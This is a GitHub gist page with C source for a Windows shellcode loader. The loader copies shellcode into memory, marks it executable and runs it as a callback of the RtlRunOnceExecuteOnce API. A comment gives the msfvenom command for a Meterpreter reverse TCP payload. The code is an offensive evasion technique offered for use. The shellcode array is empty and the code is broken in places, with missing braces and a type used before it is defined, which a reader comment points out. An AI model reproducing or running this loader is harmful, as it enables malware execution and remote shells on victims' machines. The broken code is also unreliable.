Skip to content

Instantly share code, notes, and snippets.

Show Gist options
  • Save paranoidninja/b929963db2e1922adee5d8bf3cac61cf to your computer and use it in GitHub Desktop.
Save paranoidninja/b929963db2e1922adee5d8bf3cac61cf to your computer and use it in GitHub Desktop.
Shellcode execution via RtlRunOnceExecuteOnce NtAPI
#include <windows.h>
#include <stdio.h>
extern WORD WINAPI RtlRunOnceExecuteOnce(RTL_RUN_ONCE *once, PRTL_RUN_ONCE_INIT_FN func, void *param, void **context);
typedef ULONG (WINAPI* RTL_RUN_ONCE_INIT_FN)(_Inout_ PRTL_RUN_ONCE RunOnce, _Inout_opt_ PVOID Parameter, _Inout_opt_ PVOID *Context);
// msfvenom LPORT=8080 LHOST= -p windows/x64/meterpreter/reverse_tcp -f c
unsigned char shellcode_bin[] =
ULONG myFunc(_Inout_ PRTL_RUN_ONCE RunOnce, _Inout_opt_ PVOID Parameter, _Inout_opt_ PVOID *Context) {
printf("Parameter: %s\n", Parameter);
DWORD flOldProtect = 0;
LPVOID addressPointer = VirtualAlloc(NULL, sizeof(shellcode_bin), MEM_RESERVE|MEM_COMMIT, PAGE_READWRITE);
memcpy(addressPointer, shellcode_bin, sizeof(shellcode_bin));
VirtualProtect(addressPointer, sizeof(shellcode_bin), PAGE_EXECUTE_READ, &flOldProtect);
return 0;
int main() {
RTL_RUN_ONCE rtlRunOnce = { 0 };
char *param = "Hello World";
// you can run a function with a parameter and a context
RtlRunOnceExecuteOnce(&rtlRunOnce, (RTL_RUN_ONCE_INIT_FN) myFunc, param, NULL);
// or the shellcode directly
// DWORD flOldProtect = 0;
// LPVOID addressPointer = VirtualAlloc(NULL, sizeof(shellcode_bin), MEM_RESERVE|MEM_COMMIT, PAGE_READWRITE);
// memcpy(addressPointer, shellcode_bin, sizeof(shellcode_bin));
// VirtualProtect(addressPointer, sizeof(shellcode_bin), PAGE_EXECUTE_READ, &flOldProtect);
// RtlRunOnceExecuteOnce(&rtlRunOnce, (RTL_RUN_ONCE_INIT_FN) addressPointer, NULL, NULL);
Copy link

Undefined identifier PRTL_ RUN_ ONCE_ INIT_ FN

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment